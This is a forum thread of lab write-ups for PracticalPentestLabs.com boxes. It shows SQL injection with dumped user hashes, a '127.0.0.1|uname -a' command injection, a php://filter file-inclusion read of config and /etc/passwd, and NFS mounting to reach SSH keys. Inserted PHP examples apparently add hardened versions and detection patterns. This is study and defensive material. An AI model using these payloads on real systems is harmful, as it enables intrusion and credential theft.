PracticalPentestLabs.com boxes writeups


(h4x0r) #1

Ok guys, I just changed the post title so we can have writeups for boxes inside that PracticalPentestLabs.com lab here :slight_smile:

Writeup structure:

HOSTNAME: … / IP: …
[spoiler] writeup_text [/spoiler]

Cheers !


#2

Never heard about it before. Seems quite new though and there is no about page at least none I could find at first sight. Might check it out when I have some spare time. So most likely not before mid August…


(h4x0r) #3

Much appreciated Mr Rick ! :slight_smile:


(CeCu) #4

I never heard it. Thanks a lot :slight_smile:


(h4x0r) #5

No problem @cecu, if you successfully PWN “HIGINI” give us some hints … it’s a pain !


(exploit) #6

Thanks for the share! I just saw that ‘HAGINI’ and got command execution on it already, but I don’t know what to do with it, nothing to read :smiley:


(h4x0r) #7

Awesome, @exploit … yeah there isn’t a flag submission system there, they are working on it as per their latest tweet

We know the current UI and website interface are crappy, we are working on something new. In the meantime you can still join and practice :slightly_smiling_face:

— PracticalPentestLabs (@ppentestlabs) June 10, 2017

Can you write a small walk-through on how you did “HIGINI”?

(DamaneDz) #9

HOSTNAME:C3PO
IP:10.0.1.6

I Found a SQLi in the Search Box

http://10.0.1.6/inc/search.php?query=xxx

By adding the single quotes you’ll get the Error message

I used SQLMap For Quick and Fast injection

as you see 3 types of injection …

Anyway

select table_name FROM information_schema.tables where table_schema='vuln' [13]:
[*] adrbook
[*] eshop_goods
[*] eshop_orders
[*] flashgames
[*] log
[*] messages
[*] provozovny
[*] review_answers
[*] review_category
[*] review_questions
[*] statistics
[*] tickets
[*] users

select column_name from information_schema.columns where table_name='users' [10]:
[*] alterpass
[*] heslo
[*] id
[*] image
[*] isadmin
[*] login
[*] nick
[*] remail
[*] secondmail
[*] telefon

SELECT id,login,heslo,isadmin FROM users [13]:

[*] 1, karel, f196c5c9a5f002d14cfc2aafce74e39b, 0
[*] 2, jana, 3f858cf8cfd59f25010e71b6b5671428, 0
[*] 12, michal, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 13, Smolicek, 593a90797681ebd0b8c44315a4caf6ff, 0
[*] 14, jezinky, 4475987873e549d5208f8ad743fc3d07, 0
[*] 15, utocnik, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 18, uzivatel, 32250170a0dca92d53ec9624f336ca24, 0
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
[*] 23, prochy, 32f055ca38a83ecb670b04edb50016ad, 0
[*] 24, prochy2, 2d8883c2d85b14fdcb44e3b3dc959535, 0
[*] 25, butterfly2, 1adbb3178591fd5bb0c248518f39bf6d, 0
[*] 26, test, 098f6bcd4621d373cade4e832627b4f6, 0
[*] 27, qyqouxmg, ae219661afe50f60419afbe08c45947d, 0

The only user that has admin privileges is admin himself :stuck_out_tongue:

[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1

Login …

go to this option

and as we know :stuck_out_tongue: the ping option uses the “system” function or “exec” or … so it’s clear that this box is vulnerable

Lemme check if it works first, let’s ping the local IP address 127.0.0.1

Okay Cool :smiley:

To Run many functions you have to use | as separator between them

The PHP code must be something like this

<?php echo system("ping {$_GET['host']}"); ?>

So Let’s Try to send this Request

127.0.0.1|uname -a

Works Fine :smiley:

Whatever …

I Tried to upload a PHP Shell using “wget” but nothing …
I Read some PHP Files using “cat” command

That lead me to the config file named “base.php”

// .... PHP code
    $mysqlServer = 'localhost';
    $mysqlUser = 'vuln';
    $mysqlPassword = 'vuln';
    $mysqlName = 'vuln';
// .... PHP code

… To Be Continued
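The ping handler the post infers, next to a hardened version, as an added example that is not code from C3PO or from the writeup (the function names are hypothetical, and `-c 1` is added so the command terminates):

```php
<?php
// Vulnerable shape inferred in the writeup above: the host parameter is
// concatenated into a shell command, so "127.0.0.1|uname -a" runs a second
// command after ping. Shown for comparison only; it is never called here.
function ping_vulnerable(string $host): string {
    return (string) shell_exec("ping -c 1 " . $host);
}

// Hardened: accept only an IP literal or a hostname, then quote the value
// with escapeshellarg() so the shell can never parse it as syntax.
function ping_hardened(string $host): string {
    if (!is_valid_ping_target($host)) {
        throw new InvalidArgumentException('host must be an IP address or hostname');
    }
    return (string) shell_exec('ping -c 1 ' . escapeshellarg($host));
}

// Validation used by the hardened handler: FILTER_VALIDATE_IP covers v4/v6
// literals; FILTER_VALIDATE_DOMAIN with FILTER_FLAG_HOSTNAME allows only
// RFC 1123 hostname characters, which excludes '|', ';', spaces and quotes.
function is_valid_ping_target(string $host): bool {
    return filter_var($host, FILTER_VALIDATE_IP) !== false
        || filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
}

// Log-review helper: flags the shell metacharacters that chain commands.
function looks_like_injection(string $host): bool {
    return preg_match('/[|;&`$()<>\n]/', $host) === 1;
}

// Constructed sample values, including the payload shape from the writeup.
$samples = ['127.0.0.1', '127.0.0.1|uname -a', 'host.example.com'];
foreach ($samples as $h) {
    printf("%-22s valid=%-3s injection=%s\n", $h,
        is_valid_ping_target($h) ? 'yes' : 'no',
        looks_like_injection($h) ? 'yes' : 'no');
}
```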


(h4x0r) #10

Awesome, thank you guys. Looking forward to more :slight_smile:


(DamaneDz) #11

HOSTNAME:TADDEO
IP:10.0.3.10

Let’s add “name” as a parameter to our request

Nothing shown! Let’s add phpinfo.php

Looks Like (LFI) Local File Include …

Let’s Read config.php file via PHP Filter

php://filter/convert.base64-encode/resource=config.php

We’ll get base64 code

<?php
define( 'DB_NAME', 'test' );

/** MySQL database username */
define( 'DB_USER', 'taddeo' );

/** MySQL database password */
define( 'DB_PASSWORD', '[email protected]' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

?>

This is The Code After Decoding …

Now Let’s Read /etc/passwd FILE

view-source:http://10.0.3.10/file.php?name=/etc/passwd

I’m Trying To upload a PHP Shell

So I’ll update this post if there is anything important or I’ll try to solve another challenge !
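An include handler of the shape the writeup implies, next to an allowlisted version and a log-review check for the php://filter trick, as an added example that is not code from TADDEO (the function names and page names are hypothetical):

```php
<?php
// Vulnerable shape implied above: "name" is included as given, so
// "php://filter/convert.base64-encode/resource=config.php" returns the
// base64 of config.php's source instead of executing it, and a plain path
// such as /etc/passwd is read straight off disk. Shown only for comparison.
function include_vulnerable(string $name): void {
    include $name;
}

// Hardened: the parameter is a key into a fixed allowlist and the path is
// built from a constant base directory, so neither a stream wrapper nor a
// traversal sequence ever reaches include.
function include_hardened(string $name): bool {
    $pages = ['home' => 'home.php', 'contact' => 'contact.php'];
    if (!array_key_exists($name, $pages)) {
        http_response_code(404);
        return false;
    }
    include __DIR__ . '/pages/' . $pages[$name];
    return true;
}

// Log-review helper: classifies a file-include parameter value.
function lfi_indicator(string $value): ?string {
    if (preg_match('#^(php|data|expect|phar|file|zip)://#i', $value)) {
        return 'stream wrapper';
    }
    if (strpos($value, '../') !== false || ($value !== '' && $value[0] === '/')) {
        return 'traversal or absolute path';
    }
    return null;
}

// Constructed sample values, including the two requests from the writeup.
$samples = [
    'home',
    'php://filter/convert.base64-encode/resource=config.php',
    '/etc/passwd',
];
foreach ($samples as $v) {
    printf("%-58s %s\n", $v, lfi_indicator($v) ?? 'ok');
}
```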


(andmuchmore) #12

HOSTNAME:TADDEO
IP:10.0.3.10

Did the same as DamaneDz
Then I used the MySQL user to log in to ssh
Then managed to escalate my privs to root

I did a quick search for the flag but didn’t have any luck.

Any ideas?


(andmuchmore) #13

HOSTNAME: RASIM
IP: 10.0.3.11

Quick nmap scan

Nmap scan report for 10.0.3.11

PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs

I tried to mount the nfs locally

mount 10.0.3.11:/ /test/

After a bit of digging around I found that /home/rasim/ had ssh keys in there.

Haven’t attempted to replace them yet but I am guessing that should give us ssh access to the box.


(Mosa Tladi) #14

10.0.1.6

Hi,

Should I not be able to ping my attack pc?

I am trying to get a shell but seeing that I am unable to even ping my PC the shell won’t connect back or is this part of the challenge?

Thanks


(h4x0r) #15

Good job on TADDEO and RASIM I was able to get a shell the same way, although I did find the FLAG in the root/ directory of the host, I think you should check back when the hosts are reverted :slight_smile:

10.0.1.6

Hi,

Should I not be able to ping my attack pc?

I am trying to get a shell but seeing that I am unable to even ping my PC the shell won’t connect back or is this part of the challenge?

Thanks

I think it’s part of the challenge, I was able to bypass that though :wink:


(DamaneDz) #16

There are no hints in the challenges so I thought I only have to exploit them
anyway I solved the first part and you can solve the second :smiley:


(andmuchmore) #17

Any hints on how you got root on C3PO?

I have a shell and I thought the overlayfs exploit might work but I couldn’t seem to get it to work. I also tried a few others and they just seemed to crash the server :disappointed:


#18

@pry0cc @oaktree: I believe this post needs to resume on IRC at this point.


(h4x0r) #19

Why @calchemist ? is there a limit on how much replies per post ?


#20

@h4x0r: Imagine me and 2-3 other folks tackling picoCTF, which lasts for 2 weeks, on the forum. It’d be much more convenient if you just hang out on IRC and at the same time you won’t be shading other posts.


(Command-Line Ninja) #21

I agree with @calchemist. The IRC is the ultimate place for figuring stuff out and solving problems. The forum is a place for discussion, perhaps writeups, how you did it, or one or two issues you may be facing. But a conversation about breaking it, that is a job for the IRC.

If you have ever used Facebook, would you have a conversation in the comment section? That is what this may be like.